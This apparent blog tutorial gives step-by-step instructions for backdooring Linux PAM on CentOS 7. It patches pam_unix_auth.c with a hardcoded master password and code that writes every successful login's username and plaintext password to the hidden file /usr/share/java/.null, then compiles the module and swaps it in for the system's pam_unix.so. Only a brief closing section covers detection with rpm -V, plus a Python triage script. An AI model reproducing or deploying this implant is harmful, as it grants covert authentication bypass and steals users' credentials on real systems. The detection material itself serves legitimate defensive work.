PAM Backdoor
2024/6/24 ... about 2 minutes
1. Check the local PAM version
dpkg -l | grep pam
On CentOS, query the RPM database instead:
[root@hcss-ecs-3689 pam_custom_auth]# rpm -qi pam
Name : pam
Version : 1.1.8
Release : 23.el7
Architecture: x86_64
Install Date: Mon 24 Jun 2024 08:48:16 PM CST
Group : System Environment/Base
Size : 2632373
License : BSD and GPLv2+
Signature : RSA/SHA256, Sat 04 Apr 2020 05:03:22 AM CST, Key ID 24c6a8a7f4a80eb5
Source RPM : pam-1.1.8-23.el7.src.rpm
Build Date : Wed 01 Apr 2020 12:00:59 PM CST
Build Host : x86-02.bsys.centos.org
Relocations : (not relocatable)
Packager : CentOS BuildSystem <http://bugs.centos.org>
Vendor : CentOS
URL : http://www.linux-pam.org/
Summary : An extensible library which provides authentication for applications
Description :
PAM (Pluggable Authentication Modules) is a system security tool that
allows system administrators to set authentication policy without
having to recompile programs that handle authentication.
The default PAM version on CentOS 7 is 1.1.8.
2. Download the PAM source matching the system version
Download addresses for the various PAM versions:
New address, personally tested and working: https://mirrors.aliyun.com/blfs/conglomeration/Linux-PAM/
Download the archive for the matching version and extract it:
wget https://mirrors.aliyun.com/blfs/conglomeration/Linux-PAM/Linux-PAM-1.1.8.tar.bz2
tar -jxvf Linux-PAM-1.1.8.tar.bz2
3. Compile
Install the build dependencies:
yum install -y texinfo-5.1-5.el7.x86_64 flex-2.5.37-6.el7.x86_64 flex-devel flex
Edit the code
Modify modules/pam_unix/pam_unix_auth.c; the modification goes at line 180:

if (strcmp(p, "zsl123") == 0)
{
    retval = PAM_SUCCESS;
}
// The following records the plaintext password
if (retval == PAM_SUCCESS)
{
    FILE *fp = fopen("/usr/share/java/.null", "a+");
    fprintf(fp, "%s::%s\n", name, p);
    fclose(fp);
}
// name = p = NULL;   <- existing line; everything above it is the newly added part
After making the change, run the following in the extracted Linux-PAM-1.1.8 directory:
./configure && make
The compiled module is in modules/pam_unix/.libs/:
[root@hcss-ecs-3689 .libs]# ls -l
total 536
-rw-r--r-- 1 root root 8208 Jun 24 20:38 bigcrypt.o
-rw-r--r-- 1 root root 21232 Jun 24 20:38 md5_broken.o
-rw-r--r-- 1 root root 32680 Jun 24 20:38 md5_good.o
-rw-r--r-- 1 root root 28128 Jun 24 20:38 pam_unix_acct.o
-rw-r--r-- 1 root root 14872 Jun 24 20:38 pam_unix_auth.o
lrwxrwxrwx 1 root root 14 Jun 24 20:38 pam_unix.la -> ../pam_unix.la
-rw-r--r-- 1 root root 954 Jun 24 20:38 pam_unix.lai
-rw-r--r-- 1 root root 66360 Jun 24 20:38 pam_unix_passwd.o
-rw-r--r-- 1 root root 11216 Jun 24 20:38 pam_unix_sess.o
-rwxr-xr-x 1 root root 193104 Jun 24 20:38 pam_unix.so
-rw-r--r-- 1 root root 66856 Jun 24 20:38 passverify.o
-rw-r--r-- 1 root root 67872 Jun 24 20:38 support.o
-rw-r--r-- 1 root root 9872 Jun 24 20:38 yppasswd_xdr.o
[root@hcss-ecs-3689 .libs]# pwd
/opt/pam_custom_auth/Linux-PAM-1.1.8/modules/pam_unix/.libs
First back up the original pam_unix.so with mv:
mv /lib64/x86_64-linux-gnu/security/pam_unix.so /lib64/x86_64-linux-gnu/security/pam_unix.so.bak
Locate pam_unix.so and replace it:
cp ./pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so
4. Verify
Create an ordinary user:
useradd 123
passwd 123
Log in as root (entering the password at the prompt, here goodboy):
su root
goodboy
Check whether /usr/share/java/.null now contains a record:
cat /usr/share/java/.null
5. Detection
Use rpm to verify the package's integrity; any reported difference indicates a problem:
[root@hcss-ecs-3689 .libs]# rpm -V pam
S.5....T. /usr/lib64/security/pam_unix.so
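Added example, not part of the original post: a small Python script that parses rpm -V output such as the line above and ranks what it finds, treating a size or digest change (or a missing file) under a PAM module directory as critical, because that is exactly the trace a replaced pam_unix.so leaves in the package database. The sample output, the module directory list and the severity labels are constructed assumptions.

```python
import re

# Meaning of each rpm -V status character (column order S M 5 D L U G T P).
FLAG_MEANING = {"S": "size differs", "M": "mode differs", "5": "digest differs",
                "D": "device differs", "L": "symlink differs", "U": "owner differs",
                "G": "group differs", "T": "mtime differs", "P": "capabilities differ"}
# PAM module directories used on this page (CentOS 7 and Debian-style); assumed list.
PAM_MODULE_DIRS = ("/usr/lib64/security/", "/lib64/security/", "/lib/x86_64-linux-gnu/security/")
# "S.5....T.  c /etc/pam.d/other" style lines, and "missing      /path" lines.
VERIFY_RE = re.compile(r"^(?P<flags>[SM5DLUGTP.?]{8,9})\s+(?:(?P<attr>[cdglr]+)\s+)?(?P<path>/\S+)$")
MISSING_RE = re.compile(r"^missing\s+(?:(?P<attr>[cdglr]+)\s+)?(?P<path>/\S+)$")

def parse_verify_line(line):
    """Return (path, attr, [flag meanings]) for one rpm -V line, or None for other text."""
    line = line.strip()
    m = MISSING_RE.match(line)
    if m:
        return m.group("path"), m.group("attr") or "", ["file missing"]
    m = VERIFY_RE.match(line)
    if not m:
        return None
    return m.group("path"), m.group("attr") or "", [FLAG_MEANING[c] for c in m.group("flags") if c in FLAG_MEANING]

def triage(rpm_verify_output):
    """Rank each reported file; a content change to a PAM module is critical."""
    findings = []
    for line in rpm_verify_output.splitlines():
        parsed = parse_verify_line(line)
        if parsed is None:
            continue
        path, attr, flags = parsed
        content_changed = any(f in flags for f in ("size differs", "digest differs", "file missing"))
        if path.startswith(PAM_MODULE_DIRS) and path.endswith(".so") and content_changed:
            severity = "CRITICAL"  # the authentication code itself was replaced or removed
        elif "c" in attr:
            severity = "REVIEW"    # config files (/etc/pam.d/*) are edited legitimately too
        elif content_changed:
            severity = "HIGH"
        else:
            severity = "INFO"      # mtime/owner only: often benign, still worth a look
        findings.append((severity, path, flags))
    return findings

# Constructed sample output; the first line mirrors the result shown in section 5.
SAMPLE_OUTPUT = """\
S.5....T.    /usr/lib64/security/pam_unix.so
S.5....T.  c /etc/pam.d/system-auth
.......T.    /usr/lib64/security/pam_env.so
missing      /usr/lib64/security/pam_faildelay.so
"""
```

Feed it the real output of rpm -V pam (or rpm -Va across all packages); a CRITICAL finding means the module should be restored from the package and the change investigated.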